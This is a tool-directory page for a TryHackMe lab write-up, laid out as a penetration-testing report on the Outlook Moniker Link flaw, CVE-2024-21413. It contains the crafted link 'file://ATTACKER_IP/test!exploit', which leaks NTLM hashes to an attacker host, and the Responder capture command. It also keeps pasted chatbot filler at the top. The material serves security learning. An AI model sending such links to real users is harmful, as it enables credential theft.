Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — ב־13 בפברואר 2024 פרסמה Microsoft חולשת אבטחה חמורה ב־Microsoft Outlook, אשר קיבלה את הזיהוי CVE-2024-21413, ומוכרת בשם Moniker Link Vulnerability. החולשה מאפשרת לתוקף לעקוף את מנגנון Protected View של Outlook | Kitploit
Tools/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationEmail SecurityLabs & Practice
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

ב־13 בפברואר 2024 פרסמה Microsoft חולשת אבטחה חמורה ב־Microsoft Outlook, אשר קיבלה את הזיהוי CVE-2024-21413, ומוכרת בשם Moniker Link Vulnerability. החולשה מאפשרת לתוקף לעקוף את מנגנון Protected View של Outlook

View Repository
119 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

On February 13, 2024, Microsoft published a critical security vulnerability in Microsoft Outlook, identified as CVE-2024-21413, known as the Moniker Link Vulnerability. The vulnerability allows an attacker to bypass Outlook's Protected View mechanism. image

Great 👍 Here is the full translation + formulation as a Penetration Testing (PT) report, in professional and clear English. As requested – only translation and formulation. You will add the answers, screenshots, and completions, and if you wish later – I'll help.


Penetration Testing Report

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 Executive Summary

On February 13, 2024, Microsoft published a critical security vulnerability in Microsoft Outlook, identified as CVE-2024-21413, known as the Moniker Link Vulnerability.

The vulnerability allows an attacker to bypass Outlook's Protected View mechanism using a specially crafted link (Moniker Link), causing the victim's Outlook client to send authentication credentials (NTLM hash) to a server controlled by the attacker – without executing a file and without an effective security warning.

The vulnerability may lead to credential leakage and also presents a theoretical possibility of Remote Code Execution (RCE) .


📌 Vulnerability Details

ParameterValue
Vulnerability IDCVE-2024-21413
Publication DateFebruary 13, 2024
Discovered byHaifei Li – Check Point Research
ImpactCredential Leak + Potential RCE
SeverityCritical
Attack ComplexityLow
CVSS Score9.8
Official Linkhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 Affected Versions

The vulnerability affects the following versions:

  • Microsoft Office LTSC 2021 – version 19.0.0 and later
  • Microsoft 365 Apps for Enterprise – version 16.0.1 and later
  • Microsoft Office 2019 – version 16.0.1 and later
  • Microsoft Office 2016 – prior to version 16.0.5435.1001

🎓 Learning Objectives

  • Understanding how the vulnerability works
  • Familiarity with Outlook's Protected View mechanism
  • Exploiting the vulnerability for credential leakage
  • Detection methods
  • Mitigation recommendations

(Vulnerability Description)

image

Microsoft Outlook allows displaying emails in HTML format and parsing various link types such as http:// and https://. Additionally, Outlook also supports special links called Moniker Links, which enable launching applications or accessing external resources on the operating system.

Under normal circumstances, when an email contains a link that launches an external application or accesses a system resource (such as a file:// link), Outlook's Protected View security mechanism is activated. This mechanism displays a security warning and blocks dangerous actions such as code execution, macros, or access to external network resources.

However, a vulnerability was found in Outlook (CVE-2024-21413) that allows bypassing the Protected View mechanism through a simple manipulation of a Moniker Link.

Findings

During the test, it was found that using a regular link like:

file://ATTACKER_IP/test

causes Outlook to attempt to access a network resource using the SMB protocol, but this attempt is blocked by Protected View.

In contrast, when the link includes the special character ! and an additional text string, for example:

file://ATTACKER_IP/test!exploit

Outlook does not activate Protected View, and makes a connection attempt to the remote server.

During this attempt:

  • Outlook tries to access the resource via SMB
  • An automatic authentication request is made
  • The user's login credentials are sent to the attacker
  • The victim's Windows netNTLMv2 hash is captured

It is important to note that the remote share does not need to actually exist, as the authentication attempt occurs regardless.

Impact

The vulnerability allows an attacker to:

  • Leak user credentials (netNTLMv2 hash)
  • Perform offline attacks (Cracking / Pass-the-Hash)
  • Move laterally within the corporate network

In addition, since Moniker Links use Windows' COM (Component Object Model) mechanism, there is a theoretical possibility of Remote Code Execution (RCE). However, as of the test date, there is no public Proof of Concept for actual RCE using this vulnerability.

Exploitation

As part of the attack, an email containing a Moniker Link similar to the one shown in the previous task is sent to the victim. The attacker's goal is to create an email with a Moniker Link that bypasses Outlook's Protected View mechanism, so that when the victim clicks the link, their Outlook client will attempt to load a file from the attacker's machine. This action causes the victim's netNTLMv2 hash to be sent and captured by the attacker.

Before performing the attack, we will review a Proof of Concept (PoC) created for demonstration purposes (also available on GitHub).

Author: CMNatic | https://github.com/cmnatic Version: 1.0 | 19/02/2024

The code uses Python and sends an HTML email containing a malicious Moniker Link.

PoC Description

The PoC:

  • Takes an attacker email address and a victim email address
  • Requires a password for SMTP authentication
    (In this room, the password for [email protected] is: attacker)
  • Contains the email's HTML content (html_content) with a malicious Moniker Link
  • Sets email fields: Subject, From, To
  • Sends the email via the mail server

In a real scenario, an SMTP server under the attacker's control is required (in this room the server is already provided).

Listening for Hash Capture – Responder

After sending the email, a Responder tool must be run on the attacker's machine to capture SMB requests.

On THM AttackBox, the interface name is ens5:

responder -I ens5

Responder listens for SMB, LLMNR, and NBT-NS requests and enables capture of authentication credentials.

Opening the Victim Machine

  • Open the victim machine via the split-screen window
  • Launch Outlook
  • Select "I don't want to sign in or create an account"
  • Close the product key entry window
  • The victim's mailbox is already pre-configured
Download Tool